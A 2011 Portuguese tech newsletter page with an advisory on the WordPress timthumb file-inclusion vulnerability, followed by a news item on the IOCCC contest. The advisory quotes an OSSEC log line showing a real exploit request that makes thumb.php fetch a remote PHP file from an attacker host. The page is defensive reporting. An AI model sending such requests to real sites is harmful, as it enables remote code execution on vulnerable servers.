De acordo com as Leis 12.965/2014 e 13.709/2018, que regulam o uso da Internet e o tratamento de dados pessoais no Brasil, ao me inscrever na newsletter do portal DICAS-L, autorizo o envio de notificações por e-mail ou outros meios e declaro estar ciente e concordar com seus Termos de Uso e Política de Privacidade.

WordPress - Corrigindo vulnerabilidade no timthumb

Colaboração: Alexandro Silva

Data de Publicação: 18 de novembro de 2011

Surgiu uma vulnerabilidade no Wordpress classificada como alta. A falha foi encontrada no script timthumb presente na maioria dos templates e permite a inclusão de arquivos maliciosos.

O Ossec alerta e bloqueia as tentativas de ataque com o objetivo de explorar está vulnerabilidade se a active-response foi habilitada.

  OSSEC HIDS Notification.
  2011 Nov 11 03:29:38
  
  Received From: acme->/var/log/httpd/www.acme.com-access_log
  Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
  Portion of the log(s):
  
  xx.xxx.xxx.xxx - - [11/Nov/2011:04:29:25 -0200] "GET //wp-content/themes/Quadro/thumb.php?src=http://picasa.com.xpl.be/yahoo.php
  
  HTTP/1.1" 404 232 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"

Para corrigi-la é necessário executar os seguintes passos:

  1. Localizar se o arquivo timthumb.php, thumb.php ou similar encontra-se no diretório template localizado em wp-content/themes;
  2. Em caso afirmativo substituir todo o código pela nova versão.
Notícia publicada originalmente no blog do autor

Mais informações

markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/


Competição de código C ofuscado retorna depois de 5 anos

Fonte: Notícias Linux

O "International Obfuscated C Code Contest" (IOCCC), Competição Internacional de Código C Ofuscado, retornou e anunciou o início da vigésima competição; a competição estava em hiato, sem resultados publicados para a última competição, que foi realizada em 2006. Agora a competição está de volta e, de 12 de novembro de 2011 até 12 de janeiro de 2012, as inscrições estão abertas para a competição de escrever o mais obscuro ou ofuscado programa em linguagem C que irá ilustrar, perversamente, a importância do estilo de programação, estressar compiladores C com relação a código estranho e demonstrar as sutilezas da linguagem C. Apesar da competição já estar aberta, as submissões online serão aceitas somente a partir de 1o. de dezembro, já que o sistema de submissão está sendo atualizado.

Adicionar comentário

* Campos obrigatórios
5000
Powered by Commentics

Comentários

Nenhum comentário ainda. Seja o primeiro!


Veja a relação completa dos artigos de Alexandro Silva